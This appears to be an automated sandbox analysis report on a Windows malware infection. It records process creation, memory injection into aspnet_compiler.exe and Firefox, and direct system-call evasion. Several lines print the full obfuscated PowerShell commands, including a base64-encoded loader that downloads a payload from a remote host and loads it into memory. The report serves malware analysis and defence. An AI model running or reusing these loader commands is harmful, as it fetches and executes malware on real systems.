                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  Source: Yara match File source: amsi32_5988.amsi.csv, type: OTHER
                  Source: Yara match File source: Process Memory Space: powershell.exe PID: 5988, type: MEMORYSTR
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe NtResumeThread: Direct from: 0x773836AC
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe NtMapViewOfSection: Direct from: 0x77382D1C
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe NtWriteVirtualMemory: Direct from: 0x77382E3C
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe NtProtectVirtualMemory: Direct from: 0x77382F9C
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe NtSetInformationThread: Direct from: 0x773763F9
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe NtCreateMutant: Direct from: 0x773835CC
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe NtNotifyChangeKey: Direct from: 0x77383C2C
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe NtSetInformationProcess: Direct from: 0x77382C5C
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe NtCreateUserProcess: Direct from: 0x7738371C
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe NtQueryInformationProcess: Direct from: 0x77382C26
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe NtResumeThread: Direct from: 0x77382FBC
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe NtWriteVirtualMemory: Direct from: 0x7738490C
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe NtAllocateVirtualMemory: Direct from: 0x77383C9C
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe NtReadFile: Direct from: 0x77382ADC
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe NtAllocateVirtualMemory: Direct from: 0x77382BFC
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe NtDelayExecution: Direct from: 0x77382DDC
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe NtQuerySystemInformation: Direct from: 0x77382DFC
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe NtOpenSection: Direct from: 0x77382E0C
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe NtQueryVolumeInformationFile: Direct from: 0x77382F2C
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe NtQuerySystemInformation: Direct from: 0x773848CC
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe NtCreateKey: Direct from: 0x77382C6C
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe NtReadVirtualMemory: Direct from: 0x77382E8C
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe NtClose: Direct from: 0x77382B6C
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe NtAllocateVirtualMemory: Direct from: 0x773848EC
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe NtQueryAttributesFile: Direct from: 0x77382E6C
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe NtSetInformationThread: Direct from: 0x77382B4C
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe NtTerminateThread: Direct from: 0x77382FCC
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe NtQueryInformationToken: Direct from: 0x77382CAC
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe NtOpenKeyEx: Direct from: 0x77382B9C
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe NtAllocateVirtualMemory: Direct from: 0x77382BEC
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe NtDeviceIoControlFile: Direct from: 0x77382AEC
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe NtCreateFile: Direct from: 0x77382FEC
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe NtOpenFile: Direct from: 0x77382DCC
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Section loaded: NULL target: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe protection: execute and read and write
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Section loaded: NULL target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write
                  Source: C:\Windows\SysWOW64\ieUnatt.exe Section loaded: NULL target: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe protection: read write
                  Source: C:\Windows\SysWOW64\ieUnatt.exe Section loaded: NULL target: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe protection: execute and read and write
                  Source: C:\Windows\SysWOW64\ieUnatt.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                  Source: C:\Windows\SysWOW64\ieUnatt.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                  Source: C:\Windows\SysWOW64\ieUnatt.exe Thread register set: target process: 5668
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 786008
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwERsHELL.exE -Ex bYPAss -nOP -w 1 -C DeviceCREdEntiAldEPloYmENT ; InvoKE-eXPRESSion($(invokE-EXpRession('[SYSTeM.Text.EncodInG]'+[ChAr]58+[chaR]0x3A+'utF8.geTsTRinG([systEM.coNvERt]'+[CHAR]0X3A+[ChaR]58+'FroMBaSe64sTRiNg('+[chAr]34+'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'+[CHAR]34+'))')))"Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwERsHELL.exE -Ex bYPAss -nOP -w 1 -C DeviceCREdEntiAldEPloYmENT ; InvoKE-eXPRESSion($(invokE-EXpRession('[SYSTeM.Text.EncodInG]'+[ChAr]58+[chaR]0x3A+'utF8.geTsTRinG([systEM.coNvERt]'+[CHAR]0X3A+[ChaR]58+'FroMBaSe64sTRiNg('+[chAr]34+'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'+[CHAR]34+'))')))"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dtaz5slk\dtaz5slk.cmdline"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verygreattrafficwithniceworkingskilltobego.vbS"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5695.tmp" "c:\Users\user\AppData\Local\Temp\dtaz5slk\CSCC90739EC0644DC2B3B75DC9F86B7B59.TMP"
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $olhento = 'JGNoYXJjbyA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9keXRmbHQ2MW4vaW1hZ2UvdXBsb2FkL3YxNzMzMTM0OTQ3L2JrbHB5c2V5ZXV0NGltcHc1MG4xLmpwZyAnOyRjb21wb3NpdGl2byA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGFydm9yaWZvcm1lID0gJGNvbXBvc2l0aXZvLkRvd25sb2FkRGF0YSgkY2hhcmNvKTskcHJvbWV0ZWRvciA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRhcnZvcmlmb3JtZSk7JGZ1c2NpdGUgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JHRhdmlsYSA9ICc8PEJBU0U2NF9FTkQ+Pic7JG1pbmlzdGVyaWFsbWVudGUgPSAkcHJvbWV0ZWRvci5JbmRleE9mKCRmdXNjaXRlKTskZGVzY3J1emFyID0gJHByb21ldGVkb3IuSW5kZXhPZigkdGF2aWxhKTskbWluaXN0ZXJpYWxtZW50ZSAtZ2UgMCAtYW5kICRkZXNjcnV6YXIgLWd0ICRtaW5pc3RlcmlhbG1lbnRlOyRtaW5pc3RlcmlhbG1lbnRlICs9ICRmdXNjaXRlLkxlbmd0aDskZG9pZGVqYW50ZSA9ICRkZXNjcnV6YXIgLSAkbWluaXN0ZXJpYWxtZW50ZTskY2FzY2V0YSA9ICRwcm9tZXRlZG9yLlN1YnN0cmluZygkbWluaXN0ZXJpYWxtZW50ZSwgJGRvaWRlamFudGUpOyR0cmljaGluYWRvID0gLWpvaW4gKCRjYXNjZXRhLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRjYXNjZXRhLkxlbmd0aCldOyR0cmVzY2FsYW50ZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHRyaWNoaW5hZG8pOyRkaWFsZWN0byA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJHRyZXNjYWxhbnRlKTskbW9zbGVtaXRhID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JG1vc2xlbWl0YS5JbnZva2UoJG51bGwsIEAoJ3R4dC5NQVJSTUFDLzQ4Ny8zLjMyMS41NDIuMjcxLy86cHR0aCcsICckbW92ZWRvcicsICckbW92ZWRvcicsICckbW92ZWRvcicsICdhc3BuZXRfY29tcGlsZXInLCAnJG1vdmVkb3InLCAnJG1vdmVkb3InLCckbW92ZWRvcicsJyRtb3ZlZG9yJywnJG1vdmVkb3InLCckbW92ZWRvcicsJyRtb3ZlZG9yJywnMScsJyRtb3ZlZG9yJykpOw==';$amenista = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($olhento));Invoke-Expression $amenistaJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe Process created: C:\Windows\SysWOW64\ieUnatt.exe "C:\Windows\SysWOW64\ieUnatt.exe"
                  Source: C:\Windows\SysWOW64\ieUnatt.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                  Source: lSomfUdjbC.exe, 0000000C.00000002.4513325400.0000000001AB1000.00000002.00000001.00040000.00000000.sdmp, lSomfUdjbC.exe, 0000000C.00000000.2454783694.0000000001AB0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: IProgram Manager
                  Source: lSomfUdjbC.exe, 0000000C.00000002.4513325400.0000000001AB1000.00000002.00000001.00040000.00000000.sdmp, lSomfUdjbC.exe, 0000000C.00000000.2454783694.0000000001AB0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
                  Source: lSomfUdjbC.exe, 0000000C.00000002.4513325400.0000000001AB1000.00000002.00000001.00040000.00000000.sdmp, lSomfUdjbC.exe, 0000000C.00000000.2454783694.0000000001AB0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
                  Source: lSomfUdjbC.exe, 0000000C.00000002.4513325400.0000000001AB1000.00000002.00000001.00040000.00000000.sdmp, lSomfUdjbC.exe, 0000000C.00000000.2454783694.0000000001AB0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
